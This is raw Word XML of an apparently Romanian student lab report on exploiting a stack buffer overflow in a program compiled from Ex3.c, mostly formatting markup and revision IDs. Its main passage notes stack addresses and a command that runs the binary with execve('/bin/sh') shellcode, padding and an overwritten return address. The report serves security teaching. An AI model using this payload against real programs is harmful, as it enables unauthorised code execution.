    <w:p w14:paraId="2017F271" w14:textId="39FADE52" w:rsidR="00E23B96" w:rsidRDefault="005A0F03" w:rsidP="00D347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77B99" wp14:editId="69EC7827">
            <wp:extent cx="5760720" cy="1974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1613" w14:textId="77777777" w:rsidR="00E23B96" w:rsidRDefault="00E23B96" w:rsidP="00E23B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cazul meu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2552C92C" w14:textId="18833289" w:rsidR="00E23B96" w:rsidRDefault="00E23B96" w:rsidP="00E23B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buffer: </w:t>
      </w:r>
      <w:r w:rsidR="0027688C" w:rsidRPr="0027688C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0xffffd060</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidRPr="0073252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\x</w:t>
      </w:r>
      <w:r w:rsidR="0027688C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="0073252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\xd</w:t>
      </w:r>
      <w:r w:rsidRPr="0073252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\xff\xff</w:t>
      </w:r>
      <w:r w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B87D780" w14:textId="0C379DA3" w:rsidR="00E23B96" w:rsidRPr="00E23B96" w:rsidRDefault="00E23B96" w:rsidP="00D347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EBP: </w:t>
      </w:r>
      <w:r w:rsidR="0027688C" w:rsidRPr="0027688C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0xffffd088</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidRPr="0073252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\x</w:t>
      </w:r>
      <w:r w:rsidR="0027688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8\xd</w:t>
      </w:r>
      <w:r w:rsidRPr="0073252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\xff\xff</w:t>
      </w:r>
      <w:r w:rsidRPr="00732523">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B63D6C" w14:textId="7781A98E" w:rsidR="0027688C" w:rsidRDefault="0027688C" w:rsidP="0003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Ștergem bucla de </w:t>
      </w:r>
      <w:r w:rsidRPr="0027688C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:i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din </w:t>
      </w:r>
      <w:r w:rsidRPr="0027688C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>funct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, recompilăm </w:t>
      </w:r>
      <w:r w:rsidRPr="0027688C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex3.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> și...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30851C5D" w14:textId="5F07578A" w:rsidR="000323D4" w:rsidRPr="000323D4" w:rsidRDefault="000323D4" w:rsidP="00032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323D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandă nouă: </w:t>
      </w:r>
      <w:r w:rsidRPr="000323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./mys $(python2 -c 'print ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*7 + "A"*8 + "\x</w:t>
      </w:r>
      <w:r w:rsidR="002768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8</w:t>
      </w:r>
      <w:r w:rsidRPr="000323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8\xd0\xff\xff" + "\x</w:t>
      </w:r>
      <w:r w:rsidR="002768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6</w:t>
      </w:r>
      <w:r w:rsidRPr="000323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0\xd0\xff\xff"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0323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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B85B4" w14:textId="33D00435" w:rsidR="000323D4" w:rsidRDefault="00F45CDC" w:rsidP="00D347A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F45C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3E2338" wp14:editId="19CF8407">
            <wp:extent cx="5760720" cy="1436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D834" w14:textId="3C176A60" w:rsidR="00091C2A" w:rsidRPr="00225F77" w:rsidRDefault="00091C2A" w:rsidP="00D347A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91C2A" w:rsidRPr="00225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7CBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D87EE4D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2643E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1046B4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229466">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1542160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9B"/>
    <w:rsid w:val="000323D4"/>
    <w:rsid w:val="00052E10"/>
    <w:rsid w:val="00091C2A"/>
    <w:rsid w:val="00095D8A"/>
    <w:rsid w:val="00172FB8"/>
    <w:rsid w:val="0018151C"/>
    <w:rsid w:val="00194FD9"/>
    <w:rsid w:val="00195EFD"/>
    <w:rsid w:val="00196A2D"/>
    <w:rsid w:val="001A0D77"/>
    <w:rsid w:val="001B3635"/>
    <w:rsid w:val="001B67DE"/>
    <w:rsid w:val="001D0B4C"/>
    <w:rsid w:val="001D2617"/>
    <w:rsid w:val="001D6BDC"/>
    <w:rsid w:val="001E10B1"/>
    <w:rsid w:val="001E1F79"/>
    <w:rsid w:val="00221F2B"/>
    <w:rsid w:val="00222EDF"/>
    <w:rsid w:val="0022565F"/>
    <w:rsid w:val="002259EC"/>
    <w:rsid w:val="00225F77"/>
    <w:rsid w:val="0022709C"/>
    <w:rsid w:val="00273289"/>
    <w:rsid w:val="0027688C"/>
    <w:rsid w:val="002821A9"/>
    <w:rsid w:val="00282D61"/>
    <w:rsid w:val="00295A05"/>
    <w:rsid w:val="002A1622"/>
    <w:rsid w:val="00315F0D"/>
    <w:rsid w:val="00351E1B"/>
    <w:rsid w:val="003C3D31"/>
    <w:rsid w:val="00400FF3"/>
    <w:rsid w:val="004B3893"/>
    <w:rsid w:val="004B3BCC"/>
    <w:rsid w:val="004C6334"/>
    <w:rsid w:val="004E2664"/>
    <w:rsid w:val="004E4CC6"/>
    <w:rsid w:val="0050637B"/>
    <w:rsid w:val="00531364"/>
    <w:rsid w:val="00544A2B"/>
    <w:rsid w:val="00545080"/>
    <w:rsid w:val="0055780F"/>
    <w:rsid w:val="00561D35"/>
    <w:rsid w:val="005A0F03"/>
    <w:rsid w:val="005A7AFD"/>
    <w:rsid w:val="005C1BE5"/>
    <w:rsid w:val="006162DE"/>
    <w:rsid w:val="00696F6A"/>
    <w:rsid w:val="006B61EA"/>
    <w:rsid w:val="006C6CFA"/>
    <w:rsid w:val="006D510F"/>
    <w:rsid w:val="006F147A"/>
    <w:rsid w:val="00732523"/>
    <w:rsid w:val="00752153"/>
    <w:rsid w:val="007626C2"/>
    <w:rsid w:val="007963DD"/>
    <w:rsid w:val="007C0CBF"/>
    <w:rsid w:val="007D53BB"/>
    <w:rsid w:val="007D6B9B"/>
    <w:rsid w:val="0080701F"/>
    <w:rsid w:val="00861EF2"/>
    <w:rsid w:val="008B36F3"/>
    <w:rsid w:val="008D6771"/>
    <w:rsid w:val="008E4D3F"/>
    <w:rsid w:val="008E50BF"/>
    <w:rsid w:val="009A15EB"/>
    <w:rsid w:val="009B5AB1"/>
    <w:rsid w:val="009D3FBA"/>
    <w:rsid w:val="009E4649"/>
    <w:rsid w:val="00A233A4"/>
    <w:rsid w:val="00A32CCF"/>
    <w:rsid w:val="00A7189F"/>
    <w:rsid w:val="00A87B9B"/>
    <w:rsid w:val="00A9381D"/>
    <w:rsid w:val="00AA5269"/>
    <w:rsid w:val="00AB0D70"/>
    <w:rsid w:val="00AC00A8"/>
    <w:rsid w:val="00B063A6"/>
    <w:rsid w:val="00B2168F"/>
    <w:rsid w:val="00B21DAD"/>
    <w:rsid w:val="00B40B5B"/>
    <w:rsid w:val="00B50F66"/>
    <w:rsid w:val="00BD3CE2"/>
    <w:rsid w:val="00BD48E9"/>
    <w:rsid w:val="00CB1730"/>
    <w:rsid w:val="00D3289B"/>
    <w:rsid w:val="00D347A9"/>
    <w:rsid w:val="00D85F17"/>
    <w:rsid w:val="00D90BEF"/>
    <w:rsid w:val="00D956D2"/>
    <w:rsid w:val="00DB13F6"/>
    <w:rsid w:val="00DB36C3"/>
    <w:rsid w:val="00DC2543"/>
    <w:rsid w:val="00DD445A"/>
    <w:rsid w:val="00E06721"/>
    <w:rsid w:val="00E1040B"/>
    <w:rsid w:val="00E23B96"/>
    <w:rsid w:val="00E43352"/>
    <w:rsid w:val="00E63622"/>
    <w:rsid w:val="00E96BBD"/>
    <w:rsid w:val="00EA17DD"/>
    <w:rsid w:val="00EB42B1"/>
    <w:rsid w:val="00EB517C"/>
    <w:rsid w:val="00ED5125"/>
    <w:rsid w:val="00EF1543"/>
    <w:rsid w:val="00EF1C5B"/>
    <w:rsid w:val="00F1172C"/>
    <w:rsid w:val="00F20804"/>
    <w:rsid w:val="00F20844"/>
    <w:rsid w:val="00F45CDC"/>
    <w:rsid w:val="00F54ED9"/>
    <w:rsid w:val="00FA0274"/>
    <w:rsid w:val="00FD4508"/>
    <w:rsid w:val="00FE1EC0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C6064"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{23D3510A-F518-4F41-8823-74363774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3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4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0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0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5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345670/stack-smashing-detecte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5</Pages>
  <Words>712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107</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-27T03:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-01T23:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>